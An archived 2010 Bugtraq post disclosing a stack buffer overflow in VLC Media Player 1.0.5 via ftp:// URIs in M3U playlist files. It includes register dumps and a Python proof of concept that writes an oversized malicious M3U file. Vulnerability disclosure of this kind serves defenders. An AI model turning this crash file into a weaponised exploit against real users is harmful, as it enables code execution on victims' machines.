lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 5 Jul 2010 18:55:29 -0000
From: praveen_recker@...y.com
To: bugtraq@...urityfocus.com
Subject: VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow

There a Vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files with ftp:// URI handler.

When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.
State of the registers when we opne the malicious file is:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)


Attaching image for above stack trace and PoC script.

#############START PYTHON########################
import sys
import string

print "\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n"

#Tested on Microsoft Windows XP Professional SP3
# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)
# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), Checked on windows 7

#edx register points to our data afetr 4255 bytes
buf1 = "ftp://" + "PRAV" + "\x44" * 4251
buf2 = buf1 + "A" * 4
buf3 = buf2 + "Z" * (100000-4259)

print "100000-4259 is: ", 100000-4259
print "Creating malicious M3U file . . .\n"

filem3u=open('m3uftp.m3u','w')
filem3u.write(buf3)
filem3u.close()

print "Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n"



'''
EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)


'''
#Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)
# Praveen Darshanam
#############END PYTHON###########################
Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)

Best Regards,
Praveen Darshanam,
Security Researcher

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ